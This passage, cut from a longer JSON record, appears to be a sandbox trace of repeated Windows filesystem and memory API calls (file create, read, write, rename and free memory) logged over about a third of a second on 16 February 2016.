"process", "timestamp": "2016-02-16 17:41:57,124", "api": "NtFreeVirtualMemory"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,124", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,124", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,134", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,134", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:57,144", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,144", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,144", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,154", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,154", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,164", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,164", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,174", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,174", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,184", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,184", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:57,194", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,194", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,204", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,204", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,214", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,214", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:57,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,234", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,234", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,244", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,244", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,244", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,254", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,254", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", 
"api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,264", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,264", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,275", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,275", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,285", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,285", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,295", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,295", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,295", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,305", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,305", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,345", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:57,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,365", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,365", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,375", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,375", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,385", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,385", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,395", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,415", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,415", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,425", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,425", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,435", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,435", "api": 